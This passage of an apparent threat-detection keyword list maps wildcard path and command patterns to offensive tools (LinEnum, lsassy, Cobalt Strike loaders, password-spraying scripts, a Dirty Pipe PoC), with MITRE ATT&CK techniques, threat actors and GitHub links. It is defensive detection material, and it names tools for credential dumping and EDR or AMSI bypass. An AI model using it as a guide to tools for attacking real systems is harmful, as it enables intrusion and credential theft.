-*/LibSnaffle*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*/LightsOut.git*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*/ligolo.git*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*/ligolo-ng*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*/LinEnum.git*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*/LinEnum/*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*/linpeas.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/linpeas.sh*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*/linux_ldso_dynamic.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux_ldso_hwcap.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux_ldso_hwcap_64.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux_offset2lib.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux-smart-enumeration.git*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*/linWinPwn*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/llmnr-resolve.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/lltd-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/load-assembly.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/LoadDllRemote.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/loader/bypass.c,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/loader/bypass.h,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/loader/x64/Release/loader.exe*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*/loadercrypt_*.php*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/local-exploits/master/CVE*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/LocalPotato.git*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*/LocalPrivEsc/*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/localroot/2.6.x/elflbl*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/localroot/2.6.x/h00lyshit*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/Locksmith.git*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,1,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z -*/log4shell.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/login_scanner*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/login-securite/DonPAPI*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/logs/*/becon_*.log,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*/logs/beacon_log*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/lookupsid.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/loot_default/*.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/loot_default/*.ps1*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/loot_default/*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/loot_finder*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/lpBunny/bof-registry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*/lsa_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/lsass.DMP*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/lsass/beacon.h*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/LSASSProtectionBypass/CredGuard.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*/LsassSilentProcessExit.git*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*/lsassy*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/lucksec/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/lucksec/CVE-2022-0847,1,1,N/A,N/A,1,1,4,2022-03-08T01:50:39Z,2022-03-08T01:17:09Z -*/lu-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/luijait/arpspoofing*,offensive_tool_keyword,arpspoofing,arp spoofing scripts,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/arpspoofing,1,1,N/A,N/A,1,15,1,2022-03-10T04:44:36Z,2021-06-29T22:57:51Z -*/ly4k/Pachine*,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,1,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z -*/lyncsmash/*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/LyncSniper.ps1*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/m3-gen.py *,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*/m4ll0k/*,offensive_tool_keyword,Github Username,github username 'hacker' hosting exploitaitont tools and passwords attacks tools,N/A,N/A,N/A,N/A,Credential Access,https://github.com/m4ll0k,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/m8r0wn/*,offensive_tool_keyword,Github Username,pentester github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/m8r0wn,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/MAAD-AF.git*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*/MaccaroniC2*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and 